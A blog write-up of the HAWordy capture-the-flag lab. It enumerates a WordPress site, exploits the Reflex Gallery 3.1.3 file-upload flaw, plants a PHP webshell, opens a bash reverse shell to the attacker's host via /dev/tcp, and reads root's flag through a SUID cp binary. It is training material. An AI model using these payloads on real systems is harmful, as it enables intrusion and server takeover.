[Offensive Security] Proving Grounds - HAWordy

[Offensive Security] Proving Grounds - HAWordy

https://portal.offensive-security.com/proving-grounds/play https://www.vulnhub.com/entry/ha-wordy,363/

jamarir's photo
jamarir
·

4 min read

Table of contents

A beginner machine with multiple paths. Only local.txt and proof.txt are valid flags.

Footprint

Open ports

Nmap scan:

kali@kali:~$ sudo nmap -sS -Pn -v10 -p- -oA syn_full 192.168.207.23
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 63

NSE scan:

kali@kali:~$ sudo nmap -sC -sV -p$(grep -oP '^\d*(?=/)(?=.* open )' syn_full.nmap |sort -u |tr '\n' ',' |grep -oP '.*(?=,)') -Pn -v10 -sF -oA vuln
PORT   STATE SERVICE REASON       VERSION
80/tcp open  http    tcp-response Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD

HTTP

ffuf can be used to enumerate the web server's resources:

kali@kali:~$ for w in /usr/share/seclists/Discovery/Web-Content/common.txt /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt; do ffuf -v -c -u http://192.168.207.23/FUZZ -t 50 -w $w -fs 0; done
"http://192.168.207.23/index.html"
"http://192.168.207.23/info.php"
"http://192.168.207.23/javascript"
"http://192.168.207.23/notes.txt"
"http://192.168.207.23/wordpress"

Let's look at notes.txt and info.php:

>>>
GET /notes.txt HTTP/1.1
Host: 192.168.207.23

<<<
You Need to ZIP Your Wayout

>>>
GET /info.php HTTP/1.1
Host: 192.168.207.23

<<<
192.168.207.23

Norhing really interesting.

A Wordpress scan shows that the plugin Reflex Gallery is outdated:

kali@kali:~$ wpscan --url http://192.168.207.23/wordpress/
[+] reflex-gallery
 | Location: http://192.168.207.23/wordpress/wp-content/plugins/reflex-gallery/
 | Last Updated: 2021-03-10T02:38:00.000Z
 | [!] The version is out of date, the latest version is 3.1.7
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.207.23/wordpress/wp-content/plugins/reflex-gallery/readme.txt

And this plugin might be vulnerable to Arbitrary File Upload:

kali@kali:~$ searchsploit wordpress reflex gallery
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)               | php/remote/36809.rb
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload                      | php/webapps/36374.txt

kali@kali:~$ searchsploit -x php/webapps/36374.txt
# Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
# add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .$_GET['Year'].'/'.$_GET['Month']. "
# Exploit :

Vulnerable File : php.php
50.      if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
173.         $result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/');

<form method="POST" action="http://127.0.0.1:1337/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03" enctype="multipart/form-data" >
    <input type="file" name="qqfile"><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>

Knowing that the uploaded files are saved in 192.168.207.23/wordpress/wp-content/uploads, we can host the following page locally:

<form method="POST" action="http://192.168.207.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2022&Month=03" enctype="multipart/form-data" >
    <input type="file" name="qqfile"><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>

Open it:

kali@kali:~$ php -S 127.0.0.1:48080
kali@kali:~$ firefox http://127.0.0.1:48080/reflex_gallery.html

And upload a webshell:

kali@kali:~$ cat webshell.php
<?php echo system($_GET['c'])?>

To get an RCE in the server:

>>>
GET /wordpress/wp-content/uploads/2022/03/webshell.php?c=id HTTP/1.1
Host: 192.168.207.23

<<<
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shelled :]

kali@kali:~$ nc -nlvp 48888
listening on [any] 48888 ...

kali@kali:~$ curl "http://192.168.207.23/wordpress/wp-content/uploads/2022/03/webshell.php?c=bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.207/48888+0>%261'"

connect to [192.168.49.207] from (UNKNOWN) [192.168.207.23] 59574
bash: cannot set terminal process group (777): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/uploads/2022/03$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation

local.txt

The user flag is readable by anyone in raj's folder:

www-data@ubuntu:/$ ls -la /home/raj
-rw-------  1 raj      raj      6678 Jul 22  2020 .ICEauthority
-rw-------  1 raj      raj         3 Jul 22  2020 .bash_history
-rw-r--r--  1 raj      raj       220 Sep  8  2019 .bash_logout
-rw-r--r--  1 raj      raj      3771 Sep  8  2019 .bashrc
drwx------ 17 raj      raj      4096 Sep  9  2019 .cache
drwx------ 15 raj      raj      4096 Sep  9  2019 .config
drwx------  3 root     root     4096 Sep  9  2019 .dbus
drwx------  3 raj      raj      4096 Sep  9  2019 .gnupg
drwx------  2 root     root     4096 Sep  9  2019 .gvfs
drwx------  3 raj      raj      4096 Sep  8  2019 .local
drwx------  5 raj      raj      4096 Sep  8  2019 .mozilla
-rw-------  1 root     root       39 Sep  9  2019 .mysql_history
-rw-r--r--  1 raj      raj       807 Sep  8  2019 .profile
drwx------  2 raj      raj      4096 Sep  9  2019 .ssh
-rw-r--r--  1 raj      raj         0 Feb 21  2020 .sudo_as_admin_successful
drwxr-xr-x  2 raj      raj      4096 Sep  9  2019 Desktop
drwxr-xr-x  2 raj      raj      4096 Sep  8  2019 Documents
drwxr-xr-x  2 raj      raj      4096 Sep  9  2019 Downloads
drwxr-xr-x  2 raj      raj      4096 Sep  8  2019 Music
drwxr-xr-x  2 raj      raj      4096 Sep  8  2019 Pictures
drwxr-xr-x  2 raj      raj      4096 Sep  8  2019 Public
drwxr-xr-x  2 raj      raj      4096 Sep  8  2019 Templates
drwxr-xr-x  2 raj      raj      4096 Sep  8  2019 Videos
-rw-r--r--  1 raj      raj      8980 Sep  8  2019 examples.desktop
-rw-r--r--  1 www-data www-data   32 Jul 13  2020 flag1.txt
-rw-r--r--  1 raj      raj        33 Mar 30 11:13 local.txt
drwxr-xr-x  2 root     root     4096 Sep  9  2019 plugin

www-data@ubuntu:/$ cat /home/raj/flag1.txt
Your flag is in another file...

www-data@ubuntu:/$ cat /home/raj/local.txt
20[...]50

proof.txt

The root is pretty straightforward as well. We need to exploit the cp command, as the SUID sticky bit is set:

www-data@ubuntu:/$ find / -perm -u=s -type f -print 2>/dev/null
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su

www-data@ubuntu:/tmp$ LFILE=/root/proof.txt
www-data@ubuntu:/tmp$ cp "$LFILE" proof.txt && cat proof.txt
6d[...]58

Even if we didn't list the /root files, we know the root flag is in proof.txt, as the lab's description says:

Only local.txt and proof.txt are valid flags.

Did you find this article valuable?

Support jamarir's blog by becoming a sponsor. Any amount is appreciated!

hackingCTFoffensive-securityVulnHubpentesting